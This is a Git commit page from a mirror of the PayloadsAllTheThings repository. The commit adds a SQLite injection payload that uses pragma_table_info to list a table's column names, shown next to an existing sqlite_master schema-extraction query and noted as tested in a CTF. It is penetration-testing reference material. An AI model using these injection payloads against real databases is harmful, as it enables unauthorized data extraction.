ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update SQLite Injection.md

Browse Source 
Column names of the specified table can be more easily extracted in a better output.
Tested during the CTF
This commit is contained in:
Pak Cyberbot 2023-08-25 15:24:52 +05:00 committed by GitHub
parent b0dfcfd438
commit d5922f421c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
SQL Injection/SQLite Injection.md
View File

@ -52,6 +52,12 @@ For a clean output
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
```
Cleaner output
```sql
SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');
```
## Boolean - Count number of tables
```sql